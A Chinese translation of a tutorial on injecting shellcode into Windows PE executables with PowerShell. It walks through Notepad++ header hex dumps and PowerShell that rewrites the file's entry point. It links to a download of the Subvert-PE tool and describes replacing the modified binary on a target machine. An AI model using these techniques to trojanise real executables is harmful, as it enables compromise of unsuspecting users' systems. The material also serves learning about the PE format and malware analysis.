
<!DOCTYPE html>
<html lang="en" class="loading">
<head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
    <meta name="viewport" content="width=device-width, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no">
    <title>【翻译】利用Powershell注入shellcode - Hexo</title>
    <meta name="apple-mobile-web-app-capable" content="yes" />
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <meta name="google" content="notranslate" />
    <meta name="keywords" content="Fechin,"> 
    <meta name="description" content="原文链接：http://www.fuzzysecurity.com/tutorials/20.html
本篇，我们将研究以编程方式将shellcode注入磁盘上的PE文件中。在此，我们只谈论exe格,"> 
    <meta name="author" content="John Doe"> 
    <link rel="alternative" href="atom.xml" title="Hexo" type="application/atom+xml"> 
    <link rel="icon" href="/img/favicon.png"> 
    
<link rel="stylesheet" href="//cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.css">

    
<link rel="stylesheet" href="/css/diaspora.css">

    <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
    <script>
         (adsbygoogle = window.adsbygoogle || []).push({
              google_ad_client: "ca-pub-8691406134231910",
              enable_page_level_ads: true
         });
    </script>
    <script async custom-element="amp-auto-ads"
        src="https://cdn.ampproject.org/v0/amp-auto-ads-0.1.js">
    </script>
<meta name="generator" content="Hexo 4.1.1"></head>

<body class="loading">
    <span id="config-title" style="display:none">Hexo</span>
    <div id="loader"></div>
    <div id="single">
    <div id="top" style="display: block;">
    <div class="bar" style="width: 0;"></div>
    <a class="icon-home image-icon" href="javascript:;" data-url="http://yoursite.com"></a>
    <div title="播放/暂停" class="icon-play"></div>
    <h3 class="subtitle">【翻译】利用Powershell注入shellcode</h3>
    <div class="social">
        <!--<div class="like-icon">-->
            <!--<a href="javascript:;" class="likeThis active"><span class="icon-like"></span><span class="count">76</span></a>-->
        <!--</div>-->
        <div>
            <div class="share">
                <a title="获取二维码" class="icon-scan" href="javascript:;"></a>
            </div>
            <div id="qr"></div>
        </div>
    </div>
    <div class="scrollbar"></div>
</div>

    <div class="section">
        <div class="article">
    <div class='main'>
        <h1 class="title">【翻译】利用Powershell注入shellcode</h1>
        <div class="stuff">
            <span>二月 04, 2020</span>
            
  <ul class="post-tags-list" itemprop="keywords"><li class="post-tags-list-item"><a class="post-tags-list-link" href="/tags/Windows%E6%B8%97%E9%80%8F/" rel="tag">Windows渗透</a></li></ul>


        </div>
        <div class="content markdown">
            <p>原文链接：<a href="http://www.fuzzysecurity.com/tutorials/20.html" target="_blank" rel="noopener">http://www.fuzzysecurity.com/tutorials/20.html</a></p>
<p>本篇，我们将研究以编程方式将shellcode注入磁盘上的PE文件中。在此，我们只谈论exe格式，PE文件格式包括许多其他扩展名（dll，ocx，sys，cpl，fon等）。手动注入shellcode非常简单，关键是要确保PE功能不变,在主机上修改PE文件，然后在目标计算机上替换。为了简化此过程，我创建了Subvert-PE，它可以动态重写PE可执行文件（x86和x64）：修补入口点偏移量，注入shellcode，然后将程序执行流传递回原本的执行流程上。</p>
<p>我不希望技术掌握在对此一无所知的人手中。因此，本文的大部分内容将集中于PE格式的相关部分。</p>
<p>这篇文章可能包含Microsoft官方文档中的信息、摘录和图像，已在下方列出。如果有人对此有疑问，请给我发送电子邮件。</p>
<h5 id="Links"><a href="#Links" class="headerlink" title="Links:"></a>Links:</h5><p>Microsoft Official PE-COFF Documentation (MSDN) -  <a href="https://msdn.microsoft.com/en-us/library/windows/desktop/ms680547%28v=vs.85%29.aspx" target="_blank" rel="noopener">here</a></p>
<p>Portable Executable (Corkami) - <a href="https://code.google.com/p/corkami/wiki/PE" target="_blank" rel="noopener">here</a></p>
<h5 id="Tool"><a href="#Tool" class="headerlink" title="Tool:"></a>Tool:</h5><p>Subvert-PE.ps1 - <a href="http://www.fuzzysecurity.com/tutorials/files/Subvert-PE.rar" target="_blank" rel="noopener">here</a></p>
<h3 id="The-PE-Header"><a href="#The-PE-Header" class="headerlink" title="The PE Header"></a>The PE Header</h3><hr>
<p>我始终认为，学习具体的示例是了解新事物的最佳方法。为了在实践中巩固理论，我们将逐步介绍32位Notepad ++程序的PE头。 PE<br>头通常包括以下部分：MS-DOS标头，富签名，PE标头，可选标头和节表。</p>
<h5 id="MS-DOS-Header"><a href="#MS-DOS-Header" class="headerlink" title="MS-DOS Header:"></a>MS-DOS Header:</h5><p> 在此示例中，DOS头从镜像的底部（0x00）扩展到0x7F（127字节）：<br> <figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">        0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F</span><br><span class="line">       --|--|--|--|--|--|--|--|--|--|--|--|--|--|--|--</span><br><span class="line">0000h: 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00  MZ.........ÿÿ..</span><br><span class="line">0010h: B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00  ¸.......@.......</span><br><span class="line">0020h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................</span><br><span class="line">0030h: 00 00 00 00 00 00 00 00 00 00 00 00 F0 00 00 00  ............ð...</span><br><span class="line">0040h: 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68  ..º..´.Í!¸.LÍ!Th</span><br><span class="line">0050h: 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F  is program canno</span><br><span class="line">0060h: 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20  t be run in DOS</span><br><span class="line">0070h: 6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00  mode....$.......</span><br><span class="line"></span><br><span class="line">TYPE            | Value              | Significance</span><br><span class="line">-------------------------------------------------------------------------------------------------</span><br><span class="line">e_magic         | 0x4D5A (MZ)        | Used to identify MS-DOS compatibility.</span><br><span class="line">-------------------------------------------------------------------------------------------------</span><br><span class="line">e_cp            | 0x0003             | File size in pages.</span><br><span class="line">-------------------------------------------------------------------------------------------------</span><br><span class="line">e_lfarlc        | 0x0040             | Address of relocation table.</span><br><span class="line">-------------------------------------------------------------------------------------------------</span><br><span class="line">e_lfanew        | 0x000000F0 (240)   | Offset to PE header.</span><br><span class="line">-------------------------------------------------------------------------------------------------</span><br><span class="line">MS-DOS Stub     |         *          | Legacy DOS stub (Windows 3.1 compatibility check).</span><br></pre></td></tr></table></figure></p>
<p> 这里首要记住的是，在偏移量为0x3c（60字节）处，有一个DWORD，它为实际的PE头提供偏移量。 PE头偏移量会不断变更。有趣的一点题外话，静态“MZ”标识符对应于MS-DOS开发人员之一Mark Zbikowski名字的缩写。</p>
<h5 id="Rich-Signature"><a href="#Rich-Signature" class="headerlink" title="Rich Signature:"></a>Rich Signature:</h5><p>出于好奇，这里提到了“Rich Signature”。 尽管PE格式的历史悠久（Windows 3.1-1993），但本节未记录在Microsoft的文档中。简要来说，Rich Signature存储PE编译的相关数据。想要更深入的了解，可以阅读<a href="http://www.ntcore.com/files/richsign.htm" target="_blank" rel="noopener">NTCore</a>上的Daniel Pistelli分析。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">        0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F</span><br><span class="line">       --|--|--|--|--|--|--|--|--|--|--|--|--|--|--|--</span><br><span class="line">0080h: 37 BA 5C 86 73 DB 32 D5 73 DB 32 D5 73 DB 32 D5  7º\†sÛ2ÕsÛ2ÕsÛ2Õ</span><br><span class="line">0090h: E4 1F 4C D5 77 DB 32 D5 54 1D 4F D5 6A DB 32 D5  ä.LÕwÛ2ÕT.OÕjÛ2Õ</span><br><span class="line">00A0h: 54 1D 5F D5 CF DB 32 D5 B0 D4 6F D5 60 DB 32 D5  T._ÕÏÛ2Õ°ÔoÕ&#96;Û2Õ</span><br><span class="line">00B0h: 73 DB 33 D5 E8 DA 32 D5 54 1D 5C D5 D7 DB 32 D5  sÛ3ÕèÚ2ÕT.\Õ×Û2Õ</span><br><span class="line">00C0h: 54 1D 4E D5 72 DB 32 D5 73 DB 32 D5 67 DB 32 D5  T.NÕrÛ2ÕsÛ2ÕgÛ2Õ</span><br><span class="line">00D0h: 54 1D 4A D5 72 DB 32 D5 52 69 63 68 73 DB 32 D5  T.JÕrÛ2ÕRichsÛ2Õ</span><br><span class="line"></span><br><span class="line">TYPE             | Value              | Significance</span><br><span class="line">-------------------------------------------------------------------------------------------------</span><br><span class="line">MSLinkerRich    |         *          | Section named for ASCII sequence &quot;Rich&quot;.</span><br></pre></td></tr></table></figure>

<h5 id="PE-Header"><a href="#PE-Header" class="headerlink" title="PE Header:"></a>PE Header:</h5><p>PE Header包含ASCII签名，后接标准COFF文件标头。应该注意的是，Rich Signature和PE头之间用空字节填充。对于Notepad ++，此处填充的大小为0x0F（15字节），但PE之间有所不同。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">        0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F</span><br><span class="line">       --|--|--|--|--|--|--|--|--|--|--|--|--|--|--|--</span><br><span class="line">00E0h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................  # 0x0F null-byte padding</span><br><span class="line">00F0h: 50 45 00 00 4C 01 04 00 7F A4 74 50 00 00 00 00  PE..L..¤tP....</span><br><span class="line">0100h: 00 00 00 00 E0 00 02 01                          ....à...</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">TYPE            | Value              | Significance</span><br><span class="line">-------------------------------------------------------------------------------------------------</span><br><span class="line">PE Signature    | 0x504500 (PE\0\0)  | ASCII PE format signature.</span><br><span class="line">-------------------------------------------------------------------------------------------------</span><br><span class="line">Machine Type    | 0x014C (i386+)     | Identifies the target machine architecture.</span><br><span class="line">-------------------------------------------------------------------------------------------------</span><br><span class="line">Number Of       | 0x0004             | Number of sections in the PE. Section table follows the</span><br><span class="line">Sections        |                    | &quot;Optional Header&quot;.</span><br><span class="line">-------------------------------------------------------------------------------------------------</span><br><span class="line">TimeDateStamp   | 0x5074A47F         | Time-stamp indicating when the file was created.</span><br><span class="line">                | 10&#x2F;09&#x2F;12 22:26:07  | (Seconds since 00:00 January 1, 1970)</span><br><span class="line">-------------------------------------------------------------------------------------------------</span><br><span class="line">Optional        | 0x00E0 (224)       | Size of the Optional Header.</span><br><span class="line">Header Size     |                    |</span><br><span class="line">-------------------------------------------------------------------------------------------------</span><br><span class="line">Characteristics | 0x0102 (32-bit)    | Flag contains attributes of the object or image.</span><br></pre></td></tr></table></figure>

<p>可以在下面找到“机器类型”和“特征”字段的所有可能值。 这些均取自Microsoft的官方文档。</p>
<p><img src="http://www.fuzzysecurity.com/tutorials/images/PE_1_Big.png" alt="tutorials"></p>
<p><img src="http://www.fuzzysecurity.com/tutorials/images/PE_2_Big.png" alt="tutorials"></p>
<h5 id="Optional-Header"><a href="#Optional-Header" class="headerlink" title="Optional Header:"></a>Optional Header:</h5><p>Optional Header向加载器提供信息。此标头的大小各不相同，并由上方PE标头中的“可选标头大小”表示。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><span class="line">        0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F</span><br><span class="line">       --|--|--|--|--|--|--|--|--|--|--|--|--|--|--|--</span><br><span class="line">0100h:                         0B 01 08 00 00 A0 0D 00          ..... ..</span><br><span class="line">0110h: 00 40 0B 00 00 00 00 00 59 71 0B 00 00 10 00 00  .@......Yq......</span><br><span class="line">0120h: 00 B0 0D 00 00 00 40 00 00 10 00 00 00 10 00 00  .°....@.........</span><br><span class="line">0130h: 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00  ................</span><br><span class="line">0140h: 00 20 1A 00 00 10 00 00 00 00 00 00 02 00 00 00  . ..............</span><br><span class="line">0150h: 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00  ................</span><br><span class="line">0160h: 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00  ................</span><br><span class="line">0170h: C4 0A 10 00 C8 00 00 00 00 30 12 00 6C EA 07 00  Ä...È....0..lê..</span><br><span class="line">0180h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................</span><br><span class="line">0190h: 00 00 00 00 00 00 00 00 10 B7 0D 00 1C 00 00 00  .........·......</span><br><span class="line">01A0h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................</span><br><span class="line">01B0h: 00 00 00 00 00 00 00 00 80 0C 0F 00 40 00 00 00  ........€...@...</span><br><span class="line">01C0h: 00 00 00 00 00 00 00 00 00 B0 0D 00 7C 06 00 00  .........°..|...</span><br><span class="line">01D0h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................</span><br><span class="line">01E0h: 00 00 00 00 00 00 00 00                          ........</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">TYPE            | Value              | Significance</span><br><span class="line">-------------------------------------------------------------------------------------------------</span><br><span class="line">Magic Number    | 0x010B (PE32)      | 0x010B (PE32) Or 0x020B (PE32+).</span><br><span class="line">-------------------------------------------------------------------------------------------------</span><br><span class="line">Code            | 0x000DA000 (892928)| Sum of the size of code sections.</span><br><span class="line">-------------------------------------------------------------------------------------------------</span><br><span class="line">Initialised     | 0x000B4000 (737280)| Sum of the size of initialised data sections.</span><br><span class="line">-------------------------------------------------------------------------------------------------</span><br><span class="line">Entry Point     | 0x000B7159         | Offset to Entry Point.</span><br><span class="line">-------------------------------------------------------------------------------------------------</span><br><span class="line">Base Of Code    | 0x00001000         | Start of the code section relative to the image base.</span><br><span class="line">-------------------------------------------------------------------------------------------------</span><br><span class="line">Base Of Data    | 0x000DB000         | Start of the data section relative to the image base.</span><br><span class="line">-------------------------------------------------------------------------------------------------</span><br><span class="line">Image Base      | 0x00400000         | Preferred image base.</span><br><span class="line">-------------------------------------------------------------------------------------------------</span><br><span class="line">Image Size      | 0x001A2000         | Size of the image in memory including headers.</span><br><span class="line">-------------------------------------------------------------------------------------------------</span><br><span class="line">Header Size     | 0x00001000         | Combined size of headers (rounded up to FileAlignment).</span><br><span class="line">-------------------------------------------------------------------------------------------------</span><br><span class="line">Subsystem Type  | 0x0002 (Win GUI)   | Subsystem required for PE.</span><br></pre></td></tr></table></figure>

<p>有关Optional Header向加载器提供信息的更完整概述，请参阅官方Microsoft文档和<a href="https://code.google.com/p/corkami/wiki/PE#Optional_Header" target="_blank" rel="noopener">此处</a>的Corkami分析。下图显示了“子系统类型”字段可能出现的值。</p>
<p><img src="http://www.fuzzysecurity.com/tutorials/images/PE_3_Big.png" alt="tutorials"></p>
<h5 id="Section-Table"><a href="#Section-Table" class="headerlink" title="Section Table:"></a>Section Table:</h5><p>Section表紧跟在Optional Header之后。由于PE镜像中不包含指向节表的指针，因此需要按照顺序，根据PE头的组合大小来计算偏移量。每个节的大小为0x28（40字节），可以从PE头中检索节的数量。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line">        0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F</span><br><span class="line">       --|--|--|--|--|--|--|--|--|--|--|--|--|--|--|--</span><br><span class="line">01E0h:                         2E 74 65 78 74 00 00 00          .text...</span><br><span class="line">01F0h: B6 96 0D 00 00 10 00 00 00 A0 0D 00 00 10 00 00  ¶–....... ......</span><br><span class="line">0200h: 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 20  ............ ..&#96;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">TYPE            | Value              | Significance</span><br><span class="line">-------------------------------------------------------------------------------------------------</span><br><span class="line">Section Name    | .text              | 8 byte, null padded UTF8 string.</span><br><span class="line">-------------------------------------------------------------------------------------------------</span><br><span class="line">Virtual Size    | 0x000D96B6 (890550)| Total size of the section when loaded into memory.</span><br><span class="line">-------------------------------------------------------------------------------------------------</span><br><span class="line">Virtual Address | 0x00001000         | Offset to the section when loaded into memory (relative to</span><br><span class="line">                |                    | the image base).</span><br><span class="line">-------------------------------------------------------------------------------------------------</span><br><span class="line">Raw Data Size   | 0x000DA000 (892928)| Size of the section on disk.</span><br><span class="line">-------------------------------------------------------------------------------------------------</span><br><span class="line">Raw Data Pointer| 0x00001000         | File pointer to the first page of the section within the</span><br><span class="line">                |                    | COFF file (rounded up to FileAlignment).</span><br><span class="line">-------------------------------------------------------------------------------------------------</span><br><span class="line">Section Flags   | 0x20000020         | Characteristics of the section.</span><br><span class="line">                | (Read &amp; Execute)   |</span><br></pre></td></tr></table></figure>
<p>下图显示了所有可能的分区标志值。但通常只有少数几个值规律（Readable/Executable, Initialized Data, Disgardable）。</p>
<p><img src="http://www.fuzzysecurity.com/tutorials/images/PE_4_Big.png" alt="tutorials"><br><img src="http://www.fuzzysecurity.com/tutorials/images/PE_5_Big.png" alt="tutorials"><br><img src="http://www.fuzzysecurity.com/tutorials/images/PE_6_Big.png" alt="tutorials"></p>
<p>上表仅显示Notepad ++ PE的第一部分。其他部分（我们总共知道4个部分）直接位于“.text”部分之后。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">        0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F</span><br><span class="line">       --|--|--|--|--|--|--|--|--|--|--|--|--|--|--|--</span><br><span class="line">0210h: 2E 72 64 61 74 61 00 00 B8 7D 02 00 00 B0 0D 00  .rdata..¸&#125;...°..</span><br><span class="line">0220h: 00 80 02 00 00 B0 0D 00 00 00 00 00 00 00 00 00  .€...°..........</span><br><span class="line">0230h: 00 00 00 00 40 00 00 40                          ....@..@</span><br><span class="line"></span><br><span class="line">0230h:                         2E 64 61 74 61 00 00 00          .data...</span><br><span class="line">0240h: 68 FF 01 00 00 30 10 00 00 D0 00 00 00 30 10 00  hÿ...0...Ð...0..</span><br><span class="line">0250h: 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0  ............@..À</span><br><span class="line"></span><br><span class="line">0260h: 2E 72 73 72 63 00 00 00 6C EA 07 00 00 30 12 00  .rsrc...lê...0..</span><br><span class="line">0270h: 00 F0 07 00 00 00 11 00 00 00 00 00 00 00 00 00  .ð..............</span><br><span class="line">0280h: 00 00 00 00 40 00 00 40                          ....@..@</span><br></pre></td></tr></table></figure>
<h3 id="使用Powershell处理二进制文件"><a href="#使用Powershell处理二进制文件" class="headerlink" title="使用Powershell处理二进制文件"></a>使用<strong>Powershell</strong>处理二进制文件</h3><hr>
<p>  现在我们对PE头格式有了基本的了解，就可以开始研究从二进制文件读取字节和将字节写入二进制文件。</p>
<h5 id="操纵数组"><a href="#操纵数组" class="headerlink" title="操纵数组:"></a>操纵数组:</h5><p>  我们首先要关注如何在十六进制字节和整数之间转换，反之亦然。</p>
  <figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"># Hex --&gt; Int</span><br><span class="line">PS C:\Users\b33f&gt; 0xA</span><br><span class="line">10</span><br><span class="line"></span><br><span class="line"># Int --&gt; Hex</span><br><span class="line">PS C:\Users\b33f&gt; &#39;&#123;0:X&#125;&#39; -f 256</span><br><span class="line">FF</span><br><span class="line"></span><br><span class="line"># Mixed values</span><br><span class="line">PS C:\Users\b33f&gt; 0xAA + 187</span><br><span class="line">357</span><br><span class="line"></span><br><span class="line">PS C:\Users\b33f&gt; &#39;&#123;0:X&#125;&#39; -f (0xCC-8)</span><br><span class="line">C4</span><br><span class="line"></span><br><span class="line">PS C:\Users\b33f&gt; &#39;&#123;0:X&#125;&#39; -f (((81*0x51*8)-((0x359*0x10)&#x2F;2))+((0x1*15)+0xf0))</span><br><span class="line">B33F # Because Math ;))</span><br></pre></td></tr></table></figure>
<p>  非常有趣，但是主要目标仍然是编辑磁盘上的文件。 我创建了一个简单的4字节文件来说明如何实现。<br>  <figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line">PS C:\Users\b33f&gt; type .\test.bin</span><br><span class="line">ª»ÌÝ</span><br><span class="line"></span><br><span class="line"># Read the file into a byte array</span><br><span class="line">PS C:\Users\b33f&gt; $read &#x3D; [System.IO.File]::ReadAllBytes(&#39;C:\Users\b33f\test.bin&#39;)</span><br><span class="line">PS C:\Users\b33f&gt; $read</span><br><span class="line">170</span><br><span class="line">187</span><br><span class="line">204</span><br><span class="line">221</span><br><span class="line"></span><br><span class="line"># We can query individual array elements</span><br><span class="line">PS C:\Users\b33f&gt; $read[0,3]</span><br><span class="line">170</span><br><span class="line">221</span><br><span class="line"></span><br><span class="line">PS C:\Users\b33f&gt; &#39;0x&#123;0&#125;&#39; -f ((($read[0..3]) | % &#123;$_.ToString(&#39;X2&#39;)&#125;) -join &#39;&#39;)</span><br><span class="line">0xAABBCCDD</span><br><span class="line"></span><br><span class="line">PS C:\Users\b33f&gt; [UInt32](&#39;0x&#123;0&#125;&#39; -f ((($read[0..3]) | % &#123;$_.ToString(&#39;X2&#39;)&#125;) -join &#39;&#39;))</span><br><span class="line">2864434397</span><br><span class="line"></span><br><span class="line"># We can assign new values to array elements</span><br><span class="line">PS C:\Users\b33f&gt; $read[2] &#x3D; 255</span><br><span class="line">PS C:\Users\b33f&gt; $read[3] &#x3D; 0xff</span><br><span class="line">PS C:\Users\b33f&gt; &#39;0x&#123;0&#125;&#39; -f ((($read[0..3]) | % &#123;$_.ToString(&#39;X2&#39;)&#125;) -join &#39;&#39;)</span><br><span class="line">0xAABBFFFF</span><br><span class="line"></span><br><span class="line"># Finally we can overwrite the file with our modified byte array</span><br><span class="line">PS C:\Users\b33f&gt; [System.IO.File]::WriteAllBytes(&#39;C:\Users\b33f\test.bin&#39;, $read)</span><br></pre></td></tr></table></figure></p>
<h5 id="编辑PE镜像"><a href="#编辑PE镜像" class="headerlink" title="编辑PE镜像"></a>编辑PE镜像</h5><p>是时候将所有这些理论付诸实践了。开始编辑PE镜像之前，我们要为自己设定一个简单的目标，即找到模块入口偏移并用0xAABBCCDD覆盖它。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"># Read entire PE array into memory</span><br><span class="line">$bytes &#x3D; [System.IO.File]::ReadAllBytes(&#39;C:\Users\b33f\Desktop\notepad++.exe&#39;)</span><br><span class="line"></span><br><span class="line"># PE Header offset at 0x3c (60-byes), little endian!</span><br><span class="line">$PEOffset &#x3D; [Int32] (&#39;0x&#123;0&#125;&#39; -f (($bytes[63..60] | % &#123;$_.ToString(&#39;X2&#39;)&#125;) -join &#39;&#39;))</span><br><span class="line">echo &quot;PE Header Offset: $PEOffset&quot;</span><br><span class="line"></span><br><span class="line"># Optional Header &#x3D; PE Header + 0x18 (24-bytes)</span><br><span class="line">$OptOffset &#x3D; $PEOffset + 24</span><br><span class="line">echo &quot;Optional Header Offset: $OptOffset&quot;</span><br><span class="line"></span><br><span class="line"># Module Entry Point &#x3D; Optional Header + 0x14 (20-bytes)</span><br><span class="line">$EntryPoint &#x3D; &#39;0x&#123;0&#125;&#39; -f ((($bytes[($OptOffset+19)..($OptOffset+16)]) | % &#123;$_.ToString(&#39;X2&#39;)&#125;) -join &#39;&#39;)</span><br><span class="line">echo &quot;Original Entry Point Offset: $EntryPoint&quot;</span><br><span class="line"></span><br><span class="line">$bytes[$OptOffset+19] &#x3D; 0xAA</span><br><span class="line">$bytes[$OptOffset+18] &#x3D; 0xBB</span><br><span class="line">$bytes[$OptOffset+17] &#x3D; 0xCC</span><br><span class="line">$bytes[$OptOffset+16] &#x3D; 0xDD</span><br><span class="line"></span><br><span class="line"># Fetch New Entry Point</span><br><span class="line">$EntryPoint &#x3D; &#39;0x&#123;0&#125;&#39; -f ((($bytes[($OptOffset+19)..($OptOffset+16)]) | % &#123;$_.ToString(&#39;X2&#39;)&#125;) -join &#39;&#39;)</span><br><span class="line">echo &quot;New Entry Point Offset: $EntryPoint&quot;</span><br><span class="line"></span><br><span class="line"># Overwrite the PE with the modified array</span><br><span class="line">[System.IO.File]::WriteAllBytes(&#39;C:\Users\b33f\Desktop\notepad++.exe&#39;, $bytes)</span><br></pre></td></tr></table></figure>
<p>在终端中运行此脚本会产生以下结果:</p>
  <figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">PS C:\Users\b33f&gt; .\Write-Pointer.ps1</span><br><span class="line">PE Header Offset: 240</span><br><span class="line">Optional Header Offset: 264</span><br><span class="line">Original Entry Point Offset: 0x000B7159</span><br><span class="line">New Entry Point Offset: 0xAABBCCDD</span><br></pre></td></tr></table></figure>
<p>让我们看看在  Immunity中加载PE会发生什么：<br><img src="http://www.fuzzysecurity.com/tutorials/images/PE_7_Big.png" alt="tutorials"></p>
<p>您会注意到入口点不是0xAABBCCDD，而是0xAAFBCCDD。 这是预料中的，因为将PE加载到内存中时，会将入口点偏移量添加到镜像基址上（0x00400000）。从我们的角度来看，这并不重要，因为我们进行的任何动态计算都会自动添加到镜像基址上。 对于rebase 和 ASLR，此值可以是静态的也可以是动态的。</p>
<p><img src="http://www.fuzzysecurity.com/tutorials/images/PE_8_big.png" alt="tutorials"></p>
